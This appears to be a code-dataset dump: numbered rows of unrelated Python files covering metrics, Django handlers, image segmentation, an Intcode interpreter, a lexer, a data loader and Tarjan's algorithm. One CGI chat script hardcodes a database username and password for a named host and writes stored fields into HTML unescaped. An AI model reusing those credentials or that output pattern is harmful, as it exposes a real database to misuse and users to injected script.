        self.pfm = [0.] * len(topk)

    def __call__(self, output, target, *args, **kwargs):
        """Update the running accuracy with one batch.

        :param output: output of classification network
        :param target: ground truth from dataset
        :return: per-k batch accuracies
        """
        if isinstance(output, tuple):
            output = output[0]
        if isinstance(target, (tuple, list)):
            target = target[0]
        batch_res = accuracy(output, target, self.topk)
        batch_size = output.size(0)
        self.data_num += batch_size
        # Accumulate correct counts, then refresh the running averages.
        self.sum = [running + item.item() * batch_size
                    for running, item in zip(self.sum, batch_res)]
        self.pfm = [total / self.data_num for total in self.sum]
        return batch_res

    def reset(self):
        """Reset all accumulated state before a new evaluation epoch."""
        self.sum = [0.] * len(self.topk)
        self.data_num = 0
        self.pfm = [0.] * len(self.topk)

    def summary(self):
        """Return the running accuracy; a per-k dict when several k were given."""
        if len(self.pfm) == 1:
            return self.pfm[0]
        perf_dict = {self.name: self.pfm[0]}
        perf_dict.update({'{}_top{}'.format(self.name, k): value
                          for k, value in zip(self.topk, self.pfm)})
        return perf_dict
@ClassFactory.register(ClassType.METRIC)
class SklearnMetrics(MetricBase):
    """Wrapper exposing any sklearn.metrics function as a vega metric."""

    def __init__(self, name, **kwargs):
        """:param name: attribute name of the sklearn.metrics function to wrap.

        Extra keyword arguments are bound to every metric call.
        """
        super().__init__()
        self.__metric_name__ = name
        self.metric_func = getattr(me, name)
        if kwargs:
            # BUG FIX: the original did partial(self.metric_func, kwargs),
            # which passed the kwargs dict as one positional argument; the
            # options must be spread as keyword arguments instead.
            self.metric_func = partial(self.metric_func, **kwargs)

    def __call__(self, output, target, *args, **kwargs):
        """Compute the wrapped sklearn metric for one batch.

        :param output: output of classification network
        :param target: ground truth from dataset
        :return: pfm
        """
        # Take the top-1 prediction per sample and compare on CPU/numpy.
        _, y_pred = output.topk(1, 1, True, True)
        y_pred = y_pred.t().detach().cpu().numpy()[0]
        y_true = target.detach().cpu().numpy()
        self.pfm = self.metric_func(y_true, y_pred)
        return self.pfm

    def reset(self):
        """No per-epoch state to clear for this metric."""
        pass

    def summary(self):
        """Return the most recently computed metric value."""
        return self.pfm
491 | 2b8ca0c8c7878536da4f31652976988cdba62d89 | from django.contrib import admin
from main_app.models import sites, statuses, redirects
# Register your models here.
admin.site.register(statuses)
admin.site.register(sites)
admin.site.register(redirects) |
492 | 19bb58ab440ca00bf6410a70a8b6bbc24eec96c1 | from django.apps import AppConfig
class MarketingemailsConfig(AppConfig):
name = 'marketingemails'
|
493 | 1614157c57b3d1b30087c42cb840d617dc91eecb | # Bengisu Ayan - 2236974
# Ceren Gรผrsoy - 2237485
import numpy as np
import cv2
B1 = "THE3-Images/B1.jpg"
B2 = "THE3-Images/B2.jpg"
B3 = "THE3-Images/B3.jpg"
B4 = "THE3-Images/B4.jpg"
B5 = "THE3-Images/B5.jpg"
def segmentation_function(image, name, blue_mask=False, white_mask=False, yellow_mask=False):
# Smooth the image
image = cv2.GaussianBlur(image,(11,11),0)
# convert to HSV color system
hsv_image = cv2.cvtColor(image, cv2.COLOR_RGB2HSV)
# define green mask
# green is applied to all the images as the dogs are all in grass
low_green = np.array([30, 0, 0])
high_green = np.array([86, 255, 255])
mask_final = cv2.inRange(hsv_image, low_green, high_green)
# define blue mask and apply it
if blue_mask == True:
low_blue = np.array([80, 0, 0])
high_blue = np.array([125, 255, 255])
mask_blue = cv2.inRange(hsv_image, low_blue, high_blue)
mask_final = mask_final + mask_blue
# define white mask and apply it
if white_mask == True:
low_white = np.array([0, 0, 200])
high_white = np.array([145,60,255])
mask_white = cv2.inRange(hsv_image, low_white, high_white)
mask_final = mask_final + mask_white
# define yellow mask and apply it
if yellow_mask == True:
low_yellow = np.array([10, 0, 0])
high_yellow = np.array([33, 255, 100])
mask_yellow = cv2.inRange(hsv_image, low_yellow, high_yellow)
mask_final = mask_final + mask_yellow
# make object white and background black
mask_final = 255 - mask_final
# apply opening to final mask
# define 27*27 elliptical structuring element for opening
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(27,27))
# apply opening
mask_final = cv2.morphologyEx(mask_final, cv2.MORPH_OPEN, kernel)
# apply closing to final mask
# define 41*41 elliptical structuring element for opening
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(41,41))
# apply closing
mask_final = cv2.morphologyEx(mask_final, cv2.MORPH_CLOSE, kernel)
# get biggest connected component
segmented_image = np.zeros_like(mask_final)
for val in np.unique(mask_final)[1:]:
mask = np.uint8(mask_final == val)
labels, stats = cv2.connectedComponentsWithStats(mask, 4)[1:3]
largest_label = 1 + np.argmax(stats[1:, cv2.CC_STAT_AREA])
segmented_image[labels == largest_label] = val
return segmented_image
# Read B1
image_bgr = cv2.imread(B1)
# convert B1 from bgr to rgb
image = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)
# Apply segmentation to B1 with only green mask
segmented_image = segmentation_function(image, 'B1', blue_mask=False, white_mask=False, yellow_mask=False)
cv2.imwrite("the3_B1_output.png", segmented_image)
# Read B2
image_bgr = cv2.imread(B2)
# convert B2 from bgr to rgb
image = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)
# Apply segmentation to B2 with green, white, yellow and blue masks
segmented_image = segmentation_function(image,'B2', blue_mask=True, white_mask=True, yellow_mask=True)
cv2.imwrite("the3_B2_output.png", segmented_image)
# Read B3
image_bgr = cv2.imread(B3)
# convert B3 from bgr to rgb
image = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)
# Apply segmentation to B3 with green and blue masks
segmented_image = segmentation_function(image,'B3', blue_mask=True, white_mask=False, yellow_mask=False)
cv2.imwrite("the3_B3_output.png", segmented_image)
# Read B4
image_bgr = cv2.imread(B4)
# convert B4 from bgr to rgb
image = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)
# Apply segmentation to B4 with green and blue masks
segmented_image = segmentation_function(image,'B4', blue_mask=True, white_mask=False, yellow_mask=False)
cv2.imwrite("the3_B4_output.png", segmented_image)
# Read B5
image_bgr = cv2.imread(B5)
# convert B5 from bgr to rgb
image = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)
# Apply segmentation to B2 with green ,yellow and blue masks
segmented_image = segmentation_function(image,'B5', blue_mask=True, white_mask=False, yellow_mask=True)
cv2.imwrite("the3_B5_output.png", segmented_image)
|
494 | 065a566b3e520c14f20d0d7d668ec58404d6e11b | # coding=utf-8
# Copyright 2016 Mystopia.
from __future__ import (absolute_import, division, generators, nested_scopes,
print_function, unicode_literals, with_statement)
from django.db.models.signals import m2m_changed, post_save
from django.dispatch import receiver
from dicpick.models import Task, TaskType
# The signal handlers below ensure that certain changes to TaskType are reflected onto all the tasks of that type.
# Note that the signal handlers run in the same transaction as the event that triggered the signal.
@receiver(post_save, sender=TaskType)
def create_task_instances(sender, instance, **kwargs):
    """Keep exactly one Task per date in the TaskType's date range.

    Supports date-range edits on the TaskType: tasks whose dates fell out
    of the range are deleted, tasks for newly covered dates are created,
    and num_people/score are synced onto every remaining task.
    """
    task_type = instance
    current_dates = {task.date for task in task_type.tasks.all()}
    wanted_dates = set(task_type.date_range())
    # Remove tasks whose dates are no longer inside the range.
    Task.objects.filter(task_type=task_type,
                        date__in=current_dates - wanted_dates).delete()
    # Create a task for every date newly covered by the range.
    for day in wanted_dates - current_dates:
        Task(task_type=task_type, date=day,
             num_people=task_type.num_people, score=task_type.score).save()
    # Propagate headcount/score changes onto all tasks of this type.
    Task.objects.filter(task_type=task_type).update(
        num_people=task_type.num_people, score=task_type.score)
@receiver(m2m_changed, sender=TaskType.tags.through)
def tags_updated(sender, instance, action, **kwargs):
    """Mirror tag additions/removals on a TaskType onto all tasks of that type."""
    pk_set = kwargs.pop('pk_set')
    if action not in ('post_add', 'post_remove'):
        return
    adding = action == 'post_add'
    for task in instance.tasks.all():
        if adding:
            task.tags.add(*pk_set)
        else:
            task.tags.remove(*pk_set)
|
495 | dc88686d3cbb4223b4de6847bf4fc29b93054b00 | #! /usr/bin/env python3
import EchooFunctions, cgi, MySQLdb, hashlib, time, requests, os

# CGI page that renders the private-message history between the logged-in
# user and the user given in the 'user' query parameter.
print ('Content-type: text/html\n')
form = cgi.FieldStorage()

# --- database connection ---
user = "i494f18_team34"
db_pass = "my+sql=i494f18_team34"
db_con = MySQLdb.connect(host="db.soic.indiana.edu", port = 3306, user=user, passwd=db_pass, db=user)
cursor = db_con.cursor()

receiverID = form.getfirst('user','')

# --- identify the logged-in user (session marker lives in the environment) ---
userName = ""
userID = ""
if "echooUser" in str(os.environ):
    userName = EchooFunctions.getUserName()
    userName = userName[0]
    userID = EchooFunctions.getUserID(cursor, userName)
admin = False
if userName != "":
    if EchooFunctions.checkUserType(cursor, userName) == "administrator":
        admin = True

# --- main contents to insert ---
friend = ""
friendList = ""
chatroom = ""
userList = []
if userID != "" and receiverID != "":
    try:
        # Parameterized query: the original interpolated userID/receiverID
        # straight into the SQL string, which is an SQL-injection hole
        # (receiverID comes from the query string).
        SQL = ("select u.userID, u.username, u.icon, m.detail, m.time_in, m.messageID "
               "from user as u, private_message as m "
               "where u.userID = m.sender and m.receiver = %s and m.sender = %s "
               "union "
               "select u.userID, u.username, u.icon, m.detail, m.time_in, m.messageID "
               "from user as u, private_message as m "
               "where u.userID = m.sender and m.receiver = %s and m.sender = %s "
               "order by messageID")
        cursor.execute(SQL, (userID, receiverID, receiverID, userID))
        results = cursor.fetchall()
    except Exception as e:
        print('<p>Something went wrong with the first SQL!</p>')
        print(SQL, "Error:", e)
    else:
        if results:
            count = 5  # force a date header before the first message
            for row in results:
                # Decode stored escapes, soft-wrapping roughly every 20 chars.
                word_count = 0
                decoded = EchooFunctions.returnSpecialChara(row[3])
                wrapped = ""
                for ch in decoded:
                    if word_count <= 20:
                        wrapped += ch
                        word_count += 1
                    else:
                        wrapped += ch + "<p>"
                        word_count = 0
                # Emit a timestamp row after every 5 messages.
                if count >= 5:
                    chatroom += '<li class="chatDate">' + str(row[4]) + '</li>'
                    count = 0
                if str(row[0]) == str(userID):
                    count += 1
                    chatroom += '<li class="mainUser">' + '<a href="userProfile.cgi?user=' + str(row[0]) + '">' + row[1] + '</a><img src="images/user/' + row[2] + '" alt="club1">'
                    chatroom += '<br><div class="messageLine">' + wrapped + '</div></li>'
                else:
                    count += 1
                    chatroom += '<li class="otherUser"><img src="images/user/' + row[2] + '" alt="club1">'
                    chatroom += '<a href="userProfile.cgi?userid=' + str(row[0]) + '">' + row[1] + '</a><br><div class="messageLine">' + wrapped + '</div></li>'
if userID == "" or receiverID == "":
    content = """<p>You don't have right access to this page</p>
    <a href='index.cgi'></a>"""
    print(content)
print(chatroom)
|
496 | 653e65281984ebb06467aeadb6f0e2b11f1bcb4d | #!/usr/bin/python3
def file_to_code(fname):
    """Read a comma-separated Intcode program from *fname* into a list of ints.

    Concatenates the values of every line in the file.
    """
    mem = []
    # 'with' guarantees the handle is closed; the original leaked it.
    with open(fname, "r") as src:
        for line in src:
            mem.extend(int(tok) for tok in line.split(","))
    return mem
class Opcode(object):
    """Base class for a decoded Intcode instruction.

    Subclasses pass their opcode number and instruction width to __init__,
    then use get_val() for parameter-mode-aware operand access.
    """

    def __init__(self, mem, ptr, code, inc):
        """
        >>> o = Opcode([1001, 2, 4, 1], 0, 1, 4)
        >>> o._Opcode__par_modes
        [0, 1]
        """
        # The low two digits are the opcode; sanity-check the subclass.
        if mem[ptr] % 100 != code:
            raise Exception("Creating Opcode%d for opcode %d" % (code, mem[ptr]))
        self.memory = mem
        self.ptr = ptr
        # Remaining digits are per-parameter modes, least significant first.
        self.__par_modes = [int(digit) for digit in reversed(str(int(mem[ptr] / 100)))]
        self.__ptr_inc = inc

    def ptr_inc(self):
        """Width of this instruction in memory cells."""
        return self.__ptr_inc

    def get_val(self, arg_idx):
        """Resolve operand *arg_idx* (1-based) according to its mode.

        Mode 0 (position): the cell holds an address. Mode 1 (immediate):
        the cell holds the value. Missing mode digits default to 0.

        >>> o = Opcode([1001, 2, 4, 1], 0, 1, 4)
        >>> o.get_val(1)
        4
        >>> o.get_val(2)
        4
        >>> o.get_val(3)
        2
        """
        mode_idx = arg_idx - 1
        mode = 0 if mode_idx >= len(self.__par_modes) else self.__par_modes[mode_idx]
        if mode == 0:
            return self.memory[self.memory[self.ptr + arg_idx]]
        elif mode == 1:
            return self.memory[self.ptr + arg_idx]

    def set_ptr(self):
        """(jump?, target) -- base instructions never set the pointer."""
        return False, 0

    def reads(self):
        raise Exception("Call to base class reads()")

    def writes(self):
        raise Exception("Call to base class writes()")

    def op(self):
        raise Exception("Call to base class op()")

    def params(self):
        raise Exception("Call to base class params()")

    def run(self):
        raise Exception("Call to base class run()")
class Opcode1(Opcode):
    """Addition: loc[arg3] = arg1 + arg2.

    >>> o = Opcode1([101, 2, 1, 3], 0)
    >>> o.run()
    True
    >>> o.memory
    [101, 2, 1, 4]
    """

    def __init__(self, mem, ptr):
        super().__init__(mem, ptr, 1, 4)
        # Operands are resolved eagerly; the destination is a raw address.
        self.__lhs = self.get_val(1)
        self.__rhs = self.get_val(2)
        self.__dest = mem[ptr + 3]

    def run(self):
        """Store the sum and keep executing."""
        self.memory[self.__dest] = self.__lhs + self.__rhs
        return True

    def params(self):
        """Operand/result summary, keyed like the day-2 puzzle text."""
        return {'noun': self.__lhs, 'verb': self.__rhs, 'result': self.__dest}

    def reads(self):
        return [self.__lhs, self.__rhs]

    def writes(self):
        return self.__dest

    def op(self):
        return "+"

    def __str__(self):
        return f"loc[{self.__dest}] = {self.__lhs} + {self.__rhs}"
class Opcode2(Opcode):
    """Multiplication: loc[arg3] = arg1 * arg2.

    >>> o = Opcode2([2, 2, 3, 4, 99], 0)
    >>> o.run()
    True
    >>> o.memory
    [2, 2, 3, 4, 12]
    """

    def __init__(self, mem, ptr):
        super().__init__(mem, ptr, 2, 4)
        # Operands are resolved eagerly; the destination is a raw address.
        self.__lhs = self.get_val(1)
        self.__rhs = self.get_val(2)
        self.__dest = mem[ptr + 3]

    def run(self):
        """Store the product and keep executing."""
        self.memory[self.__dest] = self.__lhs * self.__rhs
        return True

    def params(self):
        """Operand/result summary, keyed like the day-2 puzzle text."""
        return {'noun': self.__lhs, 'verb': self.__rhs, 'result': self.__dest}

    def reads(self):
        return [self.__lhs, self.__rhs]

    def writes(self):
        return self.__dest

    def op(self):
        return "*"

    def __str__(self):
        return f"loc[{self.__dest}] = {self.__lhs} * {self.__rhs}"
class Opcode99(Opcode):
    """HALT: stops the interpreter.

    >>> o = Opcode99([99,12,3,4,5], 0)
    >>> o.run()
    False
    """

    def __init__(self, mem, ptr):
        super().__init__(mem, ptr, 99, 1)

    def run(self):
        """Signal the interpreter to stop."""
        return False

    def params(self):
        return {}

    def reads(self):
        return []

    def writes(self):
        return None

    def op(self):
        return "HALT"

    def __str__(self):
        return "HALT"
def default_ops():
    """Return a fresh opcode -> handler-class dispatch table."""
    return {
        1: Opcode1,
        2: Opcode2,
        99: Opcode99,
    }
class Interpreter(object):
    """Executes an Intcode program held in a flat memory list."""

    def __init__(self, input_code, ops=None):
        """Create an interpreter over *input_code*.

        ops -- optional {opcode: handler-class} dispatch table.

        Bug fix: the original signature was ``ops=default_ops()``.  A default
        argument is evaluated once at definition time, so every Interpreter
        shared a single dict and rebind() on one instance silently changed
        all others.  Building the table per instance fixes that while staying
        call-compatible.
        """
        self.__memory = input_code
        self.__ops = ops if ops is not None else default_ops()
        self.__ptr = 0
        self.__running = True
        self.length = len(self.__memory)

    def stepi(self):
        """Execute one instruction; return its Opcode (None once halted)."""
        o = None
        if self.__running:
            o = self.next_op()
            self.__running = o.run()
            chk, val = o.set_ptr()
            # Jump if the opcode set the pointer, otherwise advance linearly.
            if chk:
                self.__ptr = val
            else:
                self.__ptr += o.ptr_inc()
        return o

    def run(self):
        """Step until a HALT stops execution."""
        while self.__running:
            self.stepi()

    def inspect(self, loc):
        """Return the value stored at address *loc*."""
        return self.__memory[loc]

    def next_op(self):
        """Decode the instruction at the current pointer."""
        return self.op_at(self.__ptr)

    def op_at(self, ptr):
        """Decode the instruction at *ptr* via the dispatch table."""
        return self.__ops[self.__memory[ptr] % 100](self.__memory, ptr)

    def __str__(self):
        """Memory dump (current cell starred) plus the decoded next op."""
        strs = []
        for i, v in enumerate(self.__memory):
            if i == self.__ptr:
                strs.append("{:*>4}".format(v))
            else:
                strs.append("{:>4}".format(v))
        return ",".join(strs) + "\n" + "Next:\n\t" + str(self.next_op())

    def poke(self, loc, val):
        """Overwrite address *loc* with *val*."""
        self.__memory[loc] = val

    def rebind(self, code, call):
        """Replace the handler for *code* (affects only this instance now)."""
        self.__ops[code] = call

    def as_opcodes(self):
        """Statically decode the program into a list of Opcode objects.

        Assumes instructions are laid out back-to-back up to the first HALT.
        """
        ops = [self.op_at(0)]
        ptr = ops[-1].ptr_inc()
        while ops[-1].op() != "HALT":
            ops.append(self.op_at(ptr))
            ptr += ops[-1].ptr_inc()
        return ops
class ValueNode(object):
    """Leaf of the expression tree: a literal value with an optional tag."""

    def __init__(self, val, tag=''):
        self.__val = val
        self.__tag = tag

    def __str__(self):
        # Rendered as "<tag><value>", e.g. "raw3_12".
        return f"{self.__tag}{self.__val}"
class OpNode(object):
    """Interior node: an opcode applied to its operand subtrees."""

    def __init__(self, op, depends):
        self.__op = op
        self.__depends = depends

    def __str__(self):
        # Infix rendering: operands joined by the op symbol, parenthesized.
        rendered = [str(child) for child in self.__depends]
        return "(" + self.__op.op().join(rendered) + ")"
class OpcodeTreeBuilder(object):
    """Builds dependency structures over a fully decoded Intcode program."""

    def __init__(self, interp):
        self.__interpreter = interp
        self.__codes = interp.as_opcodes()
        # Bug fix: these maps were never initialized anywhere, so
        # construct_mappings() raised AttributeError on first use.
        self.__writes_to = {}
        self.__reads_from = {}

    def construct_mappings(self):
        """Index opcodes by the location they write and the values they read."""
        for code in self.__codes:
            params = code.params()
            if 'result' in params:
                self.__writes_to.setdefault(params['result'], []).append(code)
            for role in ('noun', 'verb'):
                if role in params:
                    self.__reads_from.setdefault(params[role], []).append(code)

    def construct_graph(self):
        """Build an expression tree linking each op to its operand producers.

        Walks the opcode list in layout order; an operand matching a location
        an earlier op wrote links to that op's node, otherwise it becomes a
        leaf ValueNode.
        NOTE(review): reads() yields resolved *values* while last_write is
        keyed by write *addresses*; the match only works when they coincide
        -- confirm against intended semantics.
        """
        op = self.__interpreter.op_at(0)
        reads = [ValueNode(self.__interpreter.inspect(i), tag="raw%d_" % (i)) for i in op.reads()]
        writes = op.writes()
        base = OpNode(op, reads)
        ptr = op.ptr_inc()
        last_write = {}
        if writes:
            last_write[writes] = base
        while op.op() != "HALT":
            op = self.__interpreter.op_at(ptr)
            if op.op() == "HALT":
                break
            depends = []
            for i in op.reads():
                if i in last_write:
                    depends.append(last_write[i])
                else:
                    depends.append(ValueNode(self.__interpreter.inspect(i)))
            base = OpNode(op, depends)
            if op.writes():
                last_write[op.writes()] = base
            ptr += op.ptr_inc()
        return base
if __name__ == '__main__':
    # Execute the doctests embedded in the docstrings above.
    import doctest
    doctest.testmod()
    #################################################
    # Example day-2 driver (left disabled):
    # i = Interpreter(file_to_code("day2_input.txt"))
    # i.run()
    # i.inspect(0)
|
497 | 8d5b75dc945844d48f52159be08fc1e6aa51fdf5 | # Takes in a word and makes a list containing individual characters
def split(word):
    """Return the characters of *word* as a list.

    list(str) is the idiomatic (and C-speed) form of the original
    character comprehension.
    """
    return list(word)
# Removes empty strings from a list, in place.
def removeEmptyStrings(lst):
    """Strip every "" from *lst* in place (returns None, like the original).

    Slice assignment rebuilds the list in one O(n) pass; the original
    looped list.remove(), which is O(n) per removal (O(n^2) overall).
    """
    lst[:] = [item for item in lst if item != ""]
# Digit characters recognised by the lexer (module-level copy; Lexer.identify
# keeps its own local duplicate of this list).
ints = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
# Global accumulator of rendered token/value pairs; cleared by run().
tokenList = []
class Token:
    """A single lexeme: a token type plus its source value."""

    def __init__(self, token, value):
        self.token = token
        self.value = value

    def display(self):
        """Render this token as a "TYPE" or "TYPE: value" string.

        For 'ERROR' tokens the error is printed and None is returned.
        """
        if self.token == 'ERROR':
            # Unknown character: report via the Error helper.
            error = Error('UnknownError', 'cannot identify character', str(self.value), 1, r'C:\Users\tanne\My_Codes\Python\ease_language\SAMPLE.py')
            print(error.display())
            return None
        # Only STRING and INT carry their value in the rendering.
        if self.token in ('STRING', 'INT'):
            return f'{self.token}: {self.value}'
        return f'{self.token}'

    def addToList(self):
        """Append the rendered form to the global tokenList."""
        tokenList.append(self.display())
class Lexer:
    """Walks a string character by character and tokenises it."""

    # Single-character tokens recognised outside of string literals.
    _SYMBOLS = {'+': 'PLUS', '-': 'MINUS', '*': 'MUL', '/': 'DIV',
                '(': 'LPAREN', ')': 'RPAREN'}

    def __init__(self, items):
        self.items = split(items)
        self.index = 0
        self.item = ''
        self.stringOn = False   # currently inside a quoted string?
        self.stringList = ''    # accumulated string-literal contents
        self.intOn = False      # kept for interface compatibility; unused

    def identify(self):
        """Classify the current character and record the resulting token."""
        tok = ''
        val = self.item
        if self.item in ('"', "'"):
            if self.stringOn:
                # Closing quote: emit the accumulated string literal.
                self.stringOn = False
                tok = 'STRING'
                val = self.getString()
            else:
                self.stringOn = True
        elif self.stringOn:
            # Inside a literal: buffer the character, emit nothing yet.
            self.addToString()
        elif self.item in ' \n':
            pass  # whitespace is skipped
        elif self.item in self._SYMBOLS:
            tok = self._SYMBOLS[self.item]
        elif self.item in '0123456789':
            tok = 'INT'
        else:
            tok = 'ERROR'
        return Token(tok, val).addToList()

    def advance(self):
        """Load the next character into self.item."""
        self.item = self.items[self.index]
        self.index += 1

    def displayAll(self):
        """Return the global token list with blank entries stripped."""
        removeEmptyStrings(tokenList)
        return tokenList

    def addToString(self):
        """Accumulate the current character into the pending string literal."""
        self.stringList += self.item

    def getString(self):
        """Return the accumulated string literal and reset the buffer."""
        collected = self.stringList
        self.stringList = ''
        return collected
class Error:
    """A diagnostic: error name, detail text, offending code, and location."""

    def __init__(self, error, detail, code, line, fileName):
        self.error = error
        self.detail = detail
        self.code = code
        self.line = line
        self.file = fileName

    def display(self):
        """Render the diagnostic in a Python-traceback-like format."""
        location = f'File "{self.file}", line {self.line}'
        return f'{location}\n {self.code}\n{self.error}: {self.detail}'
# Runs needed methods
def run(text):
    """Tokenise *text*, print the resulting token list, and reset state."""
    lexer = Lexer(text)
    # One advance+identify step per character of input.
    for _ in split(text):
        lexer.advance()
        lexer.identify()
    print(lexer.displayAll())
    # tokenList is module-global; clear it so the next run starts fresh.
    tokenList.clear()
498 | 20649decd3ff21b1aa814d0a04180195cac3629b | #loadconc.py - possibly these classes will be added to ajustador/loader.py when ready
# -*- coding:utf-8 -*-
from __future__ import print_function, division
import numpy as np
from ajustador import xml,nrd_fitness
import glob
import os
import operator
msec_per_sec=1000
nM_per_uM=1000
nM_per_mM=1e6
class trace(object):
    """One measured concentration-vs-time trace for a single molecule.

    Parses the column header (*molname*) for units and scale, converts the
    y values to nM, and extracts basal/peak features around *stim_time*.
    """
    def __init__(self, molname, x, y,stim_time):
        # Header format: "<name> [units] [scale]", e.g. "Ca (uM) 2".
        molname_parts=molname.split()
        self.molname=molname_parts[0]
        self.norm=False
        if len(molname_parts)>1:
            self.units=molname_parts[1]
            if '%' in self.units:
                # Percent units mean the trace is normalized (e.g. FRET %).
                self.norm=True
            if len(molname_parts)>2:
                #strip out any trailing non-numeric characters from the scale field
                self.scale=int(''.join([c for c in molname_parts[2] if c.isdigit()]))
            else:
                self.scale=1
        else:
            # No units in the header: assume nM, unscaled.
            self.units='nM'
            self.scale=1
        # Convert y to nM; units may appear with or without parentheses.
        if self.units.startswith('m') or self.units.startswith('(m'):
            yvalue=y*nM_per_mM
        elif self.units.startswith('u') or self.units.startswith('(u'):
            yvalue=y*nM_per_uM
        else:
            #assume nM (or percent if fret)
            yvalue=y
        # Paired (time, concentration) record array for downstream fitting.
        self.wave=np.rec.fromarrays((x, yvalue), names='x,y')
        #calculate features: baseline, peaktime, peak value
        start_index,basal=nrd_fitness.basal(x,yvalue,stim_time)
        self.exp_basal=basal
        pt,peak=nrd_fitness.peak(x,yvalue,start_index)
        self.features={'basal':basal, 'stim_pt': start_index,'peaktime':pt,'peakval': peak}
class CSV_conc(object):
    """Load a series of concentration measurements from a CSV file

    Each CSV file contains data for one or more molecules:
    Time time_units, mol_name1 (nM), [mol_name2]
    read time_units (sec,msec,min allowed) and convert to msec
    """
    def __init__(self, fname,rootname,stim_time,features=[]):
        import pandas as pd
        # Injection/parameter value is encoded in the filename relative to rootname.
        model_num=xml.modelname_to_param(fname,rootname)
        # Experiment name = filename without its extension.
        self.name=os.path.basename(fname)[0:os.path.basename(fname).rfind('.')]
        self.injection=model_num
        self.features=features
        csv = pd.read_csv(fname, index_col=0)
        # The index header may carry time units, e.g. "Time (sec)".
        x_head=csv.index.name.split()
        if len(x_head)>1:
            time_units=x_head[-1]
            # Convert whatever units were given to msec.
            if time_units.startswith('sec') or time_units.startswith('(sec'):
                time_factor=msec_per_sec
            elif time_units.startswith('min') or time_units.startswith('(min'):
                time_factor=msec_per_sec*60 #sec_per_min
            else:
                # Unrecognized units: assume the values are already msec.
                time_factor=1
            print('x column header: {}, time_units: {}, conversion factor: {}'.format(x_head,time_units,time_factor))
        else:
            # No units in the header: assume msec.
            time_factor=1
        x = csv.index.values*time_factor #time values
        #may want to read units of y value, e.g. allow uM or mM and convert to nM
        # One trace per data column, keyed by molecule name (first header word).
        self.waves = {col.split()[0]:trace(col, x, csv[col].values,stim_time) for col in csv.columns}
class CSV_conc_set(object):
    """A set of CSV_conc experiments, one per file, differing in stim protocol.

    *rootname* may be a directory, a single .csv path, or a filename prefix.
    """

    def __init__(self, rootname, stim_time=0, features=[]):
        self.stim_time = stim_time * msec_per_sec
        self.features = features
        if os.path.isdir(rootname):
            # Directory: take every csv file inside it.
            dirname = rootname
            filenames = glob.glob(rootname + '/*.csv')
            self.name = rootname
        else:
            if rootname.endswith('.csv'):
                # Single explicit file.
                filenames = [rootname]
            else:
                # Common prefix + variable suffix.
                filenames = glob.glob(rootname + '*.csv')
            dirname = os.path.dirname(rootname)
            self.name = os.path.basename(rootname)
        print('CSV_conc_set:', self.name, 'dir', dirname, 'files', filenames, 'stim_start (ms)', self.stim_time)
        if not filenames:
            print('**************** CSV_conc_set: NO FILES FOUND **************************')
        # One CSV_conc per file, sorted by the injection value parsed from the name.
        experiments = [CSV_conc(fn, rootname, self.stim_time, features) for fn in filenames]
        experiments.sort(key=operator.attrgetter('injection'))
        self.data = experiments
|
499 | bb2c684fd5b962c97c033d4b4c2027d52b7371fd | import voldemort
import time
# Connect to the Voldemort key/value store holding the author graph.
# NOTE(review): {'0', 6666} is a *set* literal; voldemort bootstrap URLs are
# normally (host, port) pairs, e.g. [('localhost', 6666)] -- confirm intent.
authorStore = voldemort.StoreClient('authorStore', [{'0', 6666}])
# Shared Tarjan state: DFS stack, finished components, next DFS index.
stack = []
components = []
index = 1
# Implementation of the Tarjan algorithm for the detection of strongly connected components.
# Function collects all authors in the database and outputs them as strongly connected components.
def tarjan():
    """Run Tarjan's SCC algorithm over the author graph and print the result.

    Loads every author record from the store, runs a DFS from each unvisited
    node, then prints the components plus total count and runtime.
    """
    timer = time.time
    start = timer()
    # "_authors" holds the directory of all author keys.
    voldemortResult = authorStore.get("_authors")
    allAuthors = voldemortResult[0][0]
    nodes = {}
    for author in allAuthors.get("content"):
        nodeKey = str(author)
        nodeValue = [authorStore.get(nodeKey)[0][0], -1, -1, False]
        # node = [author record, index (int), lowlink (int), onStack (bool)]
        nodes[nodeKey] = nodeValue
    # Start a DFS from every node not yet visited (index still -1).
    for nodeKey in nodes:
        node = nodes.get(nodeKey)
        if node[1] == -1:
            strongconnect(node, nodes)
    end = timer()
    # Report (user-facing strings intentionally left in German).
    for scc in components:
        print("==> NEUE KOMPONENTE")
        for node in scc:
            print("Index: " + str(node[1]) + ", Lowlink: " + str(node[2]) + ", Name: " + node[0].get('name'))
    print("Insgesamt sind es " + str(len(components)) + " Komponenten")
    print("Laufzeit: " + str(end - start) + " Sekunden")
# This method connects every node in the graph and builds, if applicable, a strongly connected component out of them.
def strongconnect(node, allNodes):
    """Tarjan DFS visit: assign index/lowlink, pop a finished SCC at its root.

    node     -- [author record, index, lowlink, onStack]; mutated in place
    allNodes -- key -> node mapping used to resolve edges
    NOTE(review): recursion depth equals the longest DFS path; large graphs
    may exceed Python's recursion limit.
    """
    global index
    node[1] = index
    node[2] = index
    index += 1
    stack.append(node)
    node[3] = True
    # Visit each outgoing edge (the "friends" adjacency list).
    for kanteKey in node[0].get("friends"):
        kanteNode = allNodes.get(str(kanteKey))
        if kanteNode[1] == -1:
            # Tree edge: recurse, then propagate the child's lowlink.
            strongconnect(kanteNode, allNodes)
            node[2] = min(node[2], kanteNode[2])
        elif kanteNode[3] == True:
            # Back edge to a node still on the stack.
            node[2] = min(node[2], kanteNode[1])
    # This node is an SCC root: pop the stack down to (and including) it.
    if node[1] == node[2]:
        scc = []
        prevNode = None
        while prevNode != node:
            prevNode = stack.pop()
            prevNode[3] = False
            scc.append(prevNode)
        components.append(scc)
tarjan() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.